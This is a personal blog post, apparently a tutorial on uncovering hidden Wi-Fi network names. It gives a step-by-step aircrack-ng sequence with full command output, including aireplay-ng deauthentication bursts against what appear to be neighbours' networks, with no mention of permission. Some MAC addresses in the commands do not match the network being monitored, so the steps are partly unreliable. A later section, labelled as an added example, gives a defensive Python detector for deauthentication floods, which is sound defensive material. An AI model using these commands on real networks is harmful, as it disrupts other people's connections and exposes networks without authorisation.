theKingOfNight's Blog

Obtaining a Hidden Wi-Fi SSID

2019/02/04

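Obtaining a hidden Wi-Fi SSID

I have been playing some Wi-Fi games recently and realized that hidden Wi-Fi networks might be faster, so I decided to play around with them.

Environment setup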

┌─[✗]─[root@parrot]─[~]
└──╼ #airmon-ng check kill
┌─[✗]─[root@parrot]─[~]
└──╼ #airmon-ng start wlan0
┌─[✗]─[root@parrot]─[~]
└──╼ #airodump-ng wlan0mon
CH 10 ][ Elapsed: 1 min ][ 2019-02-03 16:20
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
68:DB:54:xx:xx:xx -47 212 15 0 4 130 WPA2 CCMP PSK <length: 0>
30:FC:68:xx:xx:xx -1 0 1 0 5 -1 WPA <length: 0>
28:F3:66:xx:xx:xx -1 0 11 0 11 -1 WPA <length: 0>
48:7D:2E:xx:xx:xx -54 69 1 0 11 405 WPA2 CCMP PSK yangxiao
38:83:45:xx:xx:xx -55 108 284 0 11 65 WPA2 CCMP PSK <length: 0>
1C:AB:34:xx:xx:xx -55 85 365 6 11 130 WPA2 CCMP PSK H3C_6B7374
88:25:93:xx:xx:xx -56 60 0 0 6 405 WPA2 CCMP PSK <length: 0>
50:BD:5F:xx:xx:xx -58 51 0 0 1 405 WPA2 CCMP PSK <length: 0>
34:CE:00:xx:xx:xx -64 89 0 0 6 54e. OPN lumi-acpartner-v2_miap13b6
B0:95:8E:xx:xx:xx -65 49 30 0 6 405 WPA2 CCMP PSK yuhuole2
2C:CC:E6:xx:xx:xx -67 6 0 0 9 130 WPA2 CCMP PSK CU_tqev

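Entries shown with length:xx like these are hidden Wi-Fi networks. I don't know their names either, but that doesn't matter.

You can check the MAC address of your own network card (it seems to have changed after I last reinstalled the system, which is odd).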

eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 80:fa:5b:xx:xx:xx txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Just pick any one entry.

CH 12 ][ Elapsed: 12 s ][ 2019-02-03 16:24
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
68:DB:54:xx:xx:xx -52 67 5462 4941 650 4 130 WPA2 CCMP PSK <length: 0>

In practice

┌─[root@parrot]─[~]
└──╼ #airodump-ng -c 4 --bssid 68:DB:54:xx:xx:xx wlan0mon

The output looks like the following. The hidden Wi-Fi's SSID can only be identified once BSSID entries show up in the lower part.

CH 4 ][ Elapsed: 14 mins ][ 2019-02-03 17:06 ][ fixed channel wlan0mon: 6
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
68:DB:54:xx:xx:xx -52 67 5462 4941 650 4 130 WPA2 CCMP PSK <length: 0>
BSSID STATION PWR Rate Lost Frames Probe
68:DB:54:xx:xx:xx 70:D9:23:xx:xx:xx -69 1e- 6 2 388
68:DB:54:xx:xx:xx 08:4A:CF:xx:xx:xx -87 0e- 1 0 106
68:DB:54:xx:xx:xx 38:6E:A2:xx:xx:xx -70 1e- 1e 0 10

Then

┌─[✗]─[root@parrot]─[~]
└──╼ #aireplay-ng -0 30 -a 38:83:45:xx:xx:xx -c 80:FA:5B:xx:xx:xx wlan0mon
16:49:11 Waiting for beacon frame (BSSID: 38:83:45:5E:E0:A2) on channel 11
16:49:12 Sending 64 directed DeAuth (code 7). STMAC: [80:FA:5B:22:0F:6E] [ 0|59 ACKs]
16:49:12 Sending 64 directed DeAuth (code 7). STMAC: [80:FA:5B:22:0F:6E] [ 0|55 ACKs]
16:49:13 Sending 64 directed DeAuth (code 7). STMAC: [80:FA:5B:22:0F:6E] [ 4|50 ACKs]
16:49:13 Sending 64 directed DeAuth (code 7). STMAC: [80:FA:5B:22:0F:6E] [ 4|57 ACKs]
。。。。。。

Try a few more times and the other side's SSID shows up; the rest is simple.

CH 4 ][ Elapsed: 14 mins ][ 2019-02-03 17:06 ][ fixed channel wlan0mon: 6
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
68:DB:54:xx:xx:xx -52 67 5462 4941 650 4 130 WPA2 CCMP PSK 001
BSSID STATION PWR Rate Lost Frames Probe
68:DB:54:xx:xx:xx 70:D9:xx:xx:xx:xx -69 1e- 6 2 388
68:DB:54:xx:xx:xx 38:6E:xx:xx:xx:xx -84 0e- 6 0 4176
68:DB:54:xx:xx:xx 08:4A:xx:xx:xx:xx -87 0e- 1 0 106
68:DB:54:xx:xx:xx 38:6E:A2:xx:xx:xx -70 1e- 1e 0 10
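
Seen from the defender's side, the directed deauthentication bursts in the aireplay-ng output above (64 frames per burst, reason code 7) stand out in a monitor-mode capture. The following is an added example, not part of the original post: it parses bare 802.11 deauthentication frames and flags any BSSID/station pair whose deauth count inside a time window reaches a threshold. The MAC addresses, timestamps, frames, window and threshold are all constructed assumptions.

```python
import struct
from collections import defaultdict, deque

DEAUTH_FC0 = 0xC0  # frame-control byte 0: version 0, type 0 (mgmt), subtype 12 (deauth)

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_deauth(frame):
    """Return (bssid, station, reason) for a bare deauth frame (no radiotap, no FCS), else None."""
    if len(frame) < 26 or frame[0] != DEAUTH_FC0:
        return None
    dst, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    (reason,) = struct.unpack_from("<H", frame, 24)  # reason code follows the 24-byte header
    # The station is whichever address is not the BSSID (deauths can travel either way).
    station = dst if src == bssid else src
    return mac(bssid), mac(station), reason

def detect_floods(capture, window=1.0, threshold=30):
    """capture: time-ordered (timestamp_seconds, frame_bytes) pairs.
    Returns {(bssid, station): peak deauth count within `window`} for pairs reaching `threshold`."""
    recent = defaultdict(deque)
    peaks = {}
    for ts, frame in capture:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        key = parsed[:2]
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            peaks[key] = max(peaks.get(key, 0), len(q))
    return peaks

def build_frame(fc0, dst, src, bssid, body=b""):
    """Constructed test frame: frame control, duration, three addresses, sequence control, body."""
    to_b = lambda m: bytes.fromhex(m.replace(":", ""))
    return bytes([fc0, 0]) + b"\x00\x00" + to_b(dst) + to_b(src) + to_b(bssid) + b"\x00\x00" + body

# Constructed capture: one ordinary deauth, a 64-frame burst with reason 7, and a beacon.
AP, STA1, STA2 = "02:00:00:00:00:01", "02:00:00:00:00:10", "02:00:00:00:00:20"
SAMPLE = [(0.0, build_frame(0xC0, AP, STA2, AP, struct.pack("<H", 3)))]
SAMPLE += [(5.0 + i * 0.005, build_frame(0xC0, STA1, AP, AP, struct.pack("<H", 7))) for i in range(64)]
SAMPLE += [(6.0, build_frame(0x80, "ff:ff:ff:ff:ff:ff", AP, AP))]  # beacon, ignored by the parser

if __name__ == "__main__":
    print(detect_floods(SAMPLE))
```

Enabling 802.11w protected management frames (PMF) on the access point and its clients makes stations discard forged deauthentication frames, which removes the forced reconnection this detector looks for.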

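Pitfalls

airodump-ng and aireplay-ng need to be running at the same time; if it fails, run aireplay-ng a few more times.
It only works when there is an SSID in the lower part of the airodump-ng output; otherwise it does not (this may be a problem with my experiment).

Restoring the network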

┌─[root@parrot]─[~]
└──╼ #ifconfig wlan0mon down
┌─[root@parrot]─[~]
└──╼ #service network-manager start
┌─[root@parrot]─[~]
└──╼ #reboot